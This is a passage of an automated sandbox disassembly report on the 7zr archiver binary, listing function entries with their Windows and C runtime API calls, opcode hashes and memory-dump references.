                                        • Instruction ID: 32193d0ce78d8cae19b559e8c34d5d7509d492c07641e434f3899cd5d7000fb3
                                        • Opcode Fuzzy Hash: 990a41d0ed29f8a0abfd0dbabc7ce8769d3f52b83f7b08778d2cc50d45e2a1b2
                                        • Instruction Fuzzy Hash: 0A515B74A00606DFCB24CF68C4909AAFFB2FF89344B10496EE597AB751D331A905DF91
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        • Opcode ID: 0107612ed94b541ccaa17ba7ec25e4db8c1742a857eb299a3eefb82f042626d6
                                        • Instruction ID: 090b50df4e9899cf1756a0ec97bccb7cc359aae3957e3a0cb0b7ce2fa61629e8
                                        • Opcode Fuzzy Hash: 0107612ed94b541ccaa17ba7ec25e4db8c1742a857eb299a3eefb82f042626d6
                                        • Instruction Fuzzy Hash: 9F41A170A00686DFDB28CF75C884B6ABFA5BF44310F188A6DD49697691C370FD81CB81
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005B4255
                                          • Part of subcall function 005B440B: __EH_prolog.LIBCMT ref: 005B4410
                                          • Part of subcall function 005A1E0C: malloc.MSVCRT ref: 005A1E1F
                                          • Part of subcall function 005A1E0C: _CxxThrowException.MSVCRT(?,00654B28), ref: 005A1E39
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: H_prolog$ExceptionThrowmalloc
                                        • String ID:
                                        • API String ID: 3744649731-0
                                        • Opcode ID: f41d70819df441a617e173b3c19fba6204abf7a16261a09f08b76426434b672b
                                        • Instruction ID: 413a9523b36edf7c270d84f7d143cb39f3c813f5272b4e5c663be62b660596ef
                                        • Opcode Fuzzy Hash: f41d70819df441a617e173b3c19fba6204abf7a16261a09f08b76426434b672b
                                        • Instruction Fuzzy Hash: 3151F3B0801B84CFC725DF69C1886DAFFF4BF19304F5588AEC49A97652D7B0A608CB61
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005CD0E6
                                          • Part of subcall function 005A1E0C: malloc.MSVCRT ref: 005A1E1F
                                          • Part of subcall function 005A1E0C: _CxxThrowException.MSVCRT(?,00654B28), ref: 005A1E39
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: ExceptionH_prologThrowmalloc
                                        • String ID:
                                        • API String ID: 3978722251-0
                                        • Opcode ID: 6b7ac4e7c6414c6d3f6328bbefffde49156b0ce4cf8e764a6f08e2b10fa2b1d8
                                        • Instruction ID: 7d4a6f65f5db8d284b5c172218bd9ad85dc211891c733ad88994743af4fab86a
                                        • Opcode Fuzzy Hash: 6b7ac4e7c6414c6d3f6328bbefffde49156b0ce4cf8e764a6f08e2b10fa2b1d8
                                        • Instruction Fuzzy Hash: CE41C771A002559FDB10DFA8C845BAEFFB5BF85310F18446DE445D7281C7709D41C7A1
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005B7FCA
                                          • Part of subcall function 005A950D: SysAllocStringLen.OLEAUT32(?,?), ref: 005A952C
                                          • Part of subcall function 005A950D: _CxxThrowException.MSVCRT(?,006555B8), ref: 005A954A
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: AllocExceptionH_prologStringThrow
                                        • String ID:
                                        • API String ID: 1940201546-0
                                        • Opcode ID: feca052fe2378f706b6228bb91e4fe9ce6aa741d27f04fd3a641ad991e56a6bc
                                        • Instruction ID: 1ccbdf1ac6f8f76aebe73c23751d7cafb725f761d1bf1a333ab9b8cbba3d9363
                                        • Opcode Fuzzy Hash: feca052fe2378f706b6228bb91e4fe9ce6aa741d27f04fd3a641ad991e56a6bc
                                        • Instruction Fuzzy Hash: A331A07282010ECACF14BFA4C859DFE7F78FF59394F406469E012A7162EE31AA08C751
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005DADBC
                                          • Part of subcall function 005DAD29: __EH_prolog.LIBCMT ref: 005DAD2E
                                          • Part of subcall function 005DAF2D: __EH_prolog.LIBCMT ref: 005DAF32
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        • Opcode ID: 62851b3b20d0ad2827d71525f61a9054c55f2c49e0b14e6ec80112dea80f8b02
                                        • Instruction ID: 6ac281bfe3e0ffd19a513fe3992897939f51a78431155ef673d4e4654f61a425
                                        • Opcode Fuzzy Hash: 62851b3b20d0ad2827d71525f61a9054c55f2c49e0b14e6ec80112dea80f8b02
                                        • Instruction Fuzzy Hash: DE41B97144ABC1DEC326DF7881656DAFFE06F26200F94899EC4EA43752D670A60CC766
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        • Opcode ID: 4a07ed25cdf3513eccd9201fcc34e75546765fe08fde7d3bf6e584e5033bb586
                                        • Instruction ID: bc2d4a45bee63cedc0d23470803b2511afcb89aff0395711fb26e74e01fae455
                                        • Opcode Fuzzy Hash: 4a07ed25cdf3513eccd9201fcc34e75546765fe08fde7d3bf6e584e5033bb586
                                        • Instruction Fuzzy Hash: 3031F6B0900219DFCB14EF95C895DAEFFB5FFD4364B20951EE42667291C7309A41CBA0
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005C98F7
                                          • Part of subcall function 005C9987: __EH_prolog.LIBCMT ref: 005C998C
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        • Opcode ID: a481239321a8c2fe4ef1a1a0ea217671159e641221d6a9ce34e5841bdc9bba94
                                        • Instruction ID: 318889a21e767df132cf921e99cc1040be05fe2fc579140fcf945a3f4067a6be
                                        • Opcode Fuzzy Hash: a481239321a8c2fe4ef1a1a0ea217671159e641221d6a9ce34e5841bdc9bba94
                                        • Instruction Fuzzy Hash: 4D1149356002459FDB14CFA9C888FAAB7B9FF89350F14895CF856DB2A1CB31E900CB60
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005C021F
                                          • Part of subcall function 005B3D66: __EH_prolog.LIBCMT ref: 005B3D6B
                                          • Part of subcall function 005B3D66: GetCurrentProcess.KERNEL32(?,00000000,?,?,00000000,00000000,759A8E30), ref: 005B3D7D
                                          • Part of subcall function 005B3D66: OpenProcessToken.ADVAPI32(00000000,00000028,?,?,00000000,?,?,00000000,00000000,759A8E30), ref: 005B3D94
                                          • Part of subcall function 005B3D66: LookupPrivilegeValueW.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 005B3DB6
                                          • Part of subcall function 005B3D66: AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,759A8E30), ref: 005B3DCB
                                          • Part of subcall function 005B3D66: GetLastError.KERNEL32(?,00000000,?,?,00000000,00000000,759A8E30), ref: 005B3DD5
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: H_prologProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                        • String ID:
                                        • API String ID: 1532160333-0
                                        • Opcode ID: 3a2e1e619e453c492cd7bc6c96871fbad7edf183d79f65d652641e9ee51a49ad
                                        • Instruction ID: 85050befd4e2a43ef2e6c26412d04b7599ea910a59251b44b9fa0e6ccb4abcd9
                                        • Opcode Fuzzy Hash: 3a2e1e619e453c492cd7bc6c96871fbad7edf183d79f65d652641e9ee51a49ad
                                        • Instruction Fuzzy Hash: 372139B1846B90CFC321CF6A82D0686FFF4BB19600B94996EC0DA83B12C770A508CF55
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005C1C74
                                          • Part of subcall function 005A6C72: __EH_prolog.LIBCMT ref: 005A6C77
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        • Opcode ID: 35c600a539f49ac9223021c224101e23e164bf0f59e4a175685ac7cf491c5691
                                        • Instruction ID: deb3cad1bb4a75854c8e33d752f9614a600fb4096f77ac12adfb9a5d02916cc5
                                        • Opcode Fuzzy Hash: 35c600a539f49ac9223021c224101e23e164bf0f59e4a175685ac7cf491c5691
                                        • Instruction Fuzzy Hash: 8C11CB31900A068FCF19EBE4C85ABEDBF79BF96350F00002CE80223193DB611D46C698
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005B7E5F
                                          • Part of subcall function 005A6C72: __EH_prolog.LIBCMT ref: 005A6C77
                                          • Part of subcall function 005A1E40: free.MSVCRT ref: 005A1E44
                                          • Part of subcall function 005A757D: GetLastError.KERNEL32(005AD14C), ref: 005A757D
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: H_prolog$ErrorLastfree
                                        • String ID:
                                        • API String ID: 683690243-0
                                        • Opcode ID: add0894aca47a92654aff856c01fb10dcfb663c6421bc250e2c55a35d8fb3a8e
                                        • Instruction ID: 8adaefad9990d4d7743382331e9aa72af13d9f40363284a14a8c83895eb1b61e
                                        • Opcode Fuzzy Hash: add0894aca47a92654aff856c01fb10dcfb663c6421bc250e2c55a35d8fb3a8e
                                        • Instruction Fuzzy Hash: 4A010872A447059FC721EF74C4929DEBFB5FF89310F00452EE44353692CA30A909CA50
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005EBF91
                                          • Part of subcall function 005ED144: __EH_prolog.LIBCMT ref: 005ED149
                                          • Part of subcall function 005A1E40: free.MSVCRT ref: 005A1E44
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: H_prolog$free
                                        • String ID:
                                        • API String ID: 2654054672-0
                                        • Opcode ID: 785371070766aaf91b6e13e3b48eec8c6ff967c206903f282422b0bdea6c560d
                                        • Instruction ID: 14ffde42656e603c759c24f28383f14ffdfb84f8782845fcf33b7bb9cc8e463f
                                        • Opcode Fuzzy Hash: 785371070766aaf91b6e13e3b48eec8c6ff967c206903f282422b0bdea6c560d
                                        • Instruction Fuzzy Hash: CF113A71800B559FC724EF64C909BCEBFF5BF42344F00891CE4A697591D7B1AA08CB84
                                        APIs
                                        • SetFileTime.KERNEL32(00000002,00000000,000000FF,00000000,00000000,80000000,00000000,?,005A1AD1,00000000,00000002,00000002,?,005A7B3E,?,00000000), ref: 005A7AFD
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: FileTime
                                        • String ID:
                                        • API String ID: 1425588814-0
                                        • Opcode ID: ef7f3d59fa45456fe780948c1e5092c70c6735e794d1b45ea6840e45b69a3ad8
                                        • Instruction ID: aec4a0d0ca4ed319891238b5c7f967dc2aab9a4d30d3e48bad5db4e65f62cc43
                                        • Opcode Fuzzy Hash: ef7f3d59fa45456fe780948c1e5092c70c6735e794d1b45ea6840e45b69a3ad8
                                        • Instruction Fuzzy Hash: C001AD7010424DBFEF268F54CC09BEE3FA9AB4A320F148149B8A6532E2D7709E61D760
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005DC0B8
                                          • Part of subcall function 005C7193: __EH_prolog.LIBCMT ref: 005C7198
                                          • Part of subcall function 005A1E40: free.MSVCRT ref: 005A1E44
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: H_prolog$free
                                        • String ID:
                                        • API String ID: 2654054672-0
                                        • Opcode ID: c36754aa4ec6a03fb1b1e3b2541fd9363fb25971fea46c4f34047792b6cf7029
                                        • Instruction ID: 141dc2f68e2144685a685f50214e7d3e16e53be69a31f8c055eed2b69211b817
                                        • Opcode Fuzzy Hash: c36754aa4ec6a03fb1b1e3b2541fd9363fb25971fea46c4f34047792b6cf7029
                                        • Instruction Fuzzy Hash: 4DF09072900616DBD7259F49D845BAEFFAEFF55760F10042FE50297711CBB29C00C694
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005E0364
                                          • Part of subcall function 005E01C4: __EH_prolog.LIBCMT ref: 005E01C9
                                          • Part of subcall function 005E0143: __EH_prolog.LIBCMT ref: 005E0148
                                          • Part of subcall function 005A1E40: free.MSVCRT ref: 005A1E44
                                          • Part of subcall function 005E03D8: __EH_prolog.LIBCMT ref: 005E03DD
                                          • Part of subcall function 005E004A: __EH_prolog.LIBCMT ref: 005E004F
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: H_prolog$free
                                        • String ID:
                                        • API String ID: 2654054672-0
                                        • Opcode ID: 91d6054e25d108e73e30a48775e4fa3f4dbf17bb19fde65fef2b0f00407f95b0
                                        • Instruction ID: c73ad74da92cbca5ce67dc2e9af6fbd1ce9114224dca0b7c1a52ec489cab54e2
                                        • Opcode Fuzzy Hash: 91d6054e25d108e73e30a48775e4fa3f4dbf17bb19fde65fef2b0f00407f95b0
                                        • Instruction Fuzzy Hash: B7F0F470914A91DBCB1DEF68C82A39DBFE5BF45314F10465DE492632D2CBF46B048748
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        • Opcode ID: 29eadcd587ea944569441cdaa9641a3523add759416fbf8e4fd07e5d98c1d394
                                        • Instruction ID: a552bbc3510e94a51fb4781f302f16660215514fcd24e82063aa6071671b13dc
                                        • Opcode Fuzzy Hash: 29eadcd587ea944569441cdaa9641a3523add759416fbf8e4fd07e5d98c1d394
                                        • Instruction Fuzzy Hash: 6CF08C72E0001AABCB10EF98D8448AEBFB5FF84750F00805AF416A7250CB348A01CB90
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005E550A
                                          • Part of subcall function 005E4E8A: __EH_prolog.LIBCMT ref: 005E4E8F
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        • Opcode ID: ab2ee8aa5dc74855f555d74ee6e1077e76f3589d4abfa7369c6b5949be92bea0
                                        • Instruction ID: c786e28fa0edfc7f8a55cc4f3e6b7dc082c94d6f48a9ed7857ec86ba4d781496
                                        • Opcode Fuzzy Hash: ab2ee8aa5dc74855f555d74ee6e1077e76f3589d4abfa7369c6b5949be92bea0
                                        • Instruction Fuzzy Hash: F0F09B76600515EFCB059F49D815BDE7FBAFF84364F10445AF44297201DB75DD008BA0
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        • Opcode ID: 5fd8f623cf7d4ce24edc3f5702c7476ff24b48a482fb804843f39b3137c6c4a2
                                        • Instruction ID: 5ae01a57896015809f5cd88b59cad65918af2875ce547f54ad1815b40425f476
                                        • Opcode Fuzzy Hash: 5fd8f623cf7d4ce24edc3f5702c7476ff24b48a482fb804843f39b3137c6c4a2
                                        • Instruction Fuzzy Hash: 2BE09271A00104EFC704EF98D855F9EBBB9FF48350F10881EF40AD7201C7749900CAA4
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005E5E30
                                          • Part of subcall function 005E08B6: __aulldiv.LIBCMT ref: 005E093F
                                          • Part of subcall function 005BDFC9: __EH_prolog.LIBCMT ref: 005BDFCE
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: H_prolog$__aulldiv
                                        • String ID:
                                        • API String ID: 604474441-0
                                        • Opcode ID: e339d19b82c850237db32deec39e4164cb67e02378c05552190abf38cb407589
                                        • Instruction ID: 4114e5234e86e87467b4c2e7bf0bb0ba00c19abd1a9bbd5e72758cdf47abcf26
                                        • Opcode Fuzzy Hash: e339d19b82c850237db32deec39e4164cb67e02378c05552190abf38cb407589
                                        • Instruction Fuzzy Hash: CBE039B0E147509FC799EFA9914529EBAF4FB48700F00586EA042D3B81DAB4A9008B90
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005E8ED6
                                          • Part of subcall function 005E9267: __EH_prolog.LIBCMT ref: 005E926C
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        • Opcode ID: ab6a52ff4ec3663454473e315f02c0ed050d5d68ecb321eea20f4f8ecd28269e
                                        • Instruction ID: b45dc1aaa4fa8efdfeab38ecb246442c2d43bc35adc02c56c7c0d819b1b9b4b4
                                        • Opcode Fuzzy Hash: ab6a52ff4ec3663454473e315f02c0ed050d5d68ecb321eea20f4f8ecd28269e
                                        • Instruction Fuzzy Hash: 1FE092719205609ACB1DEB64D526BDDBBA8FF44704F00065DA043A3682CBB46604C781
                                        APIs
                                        • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 005A7C8B
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
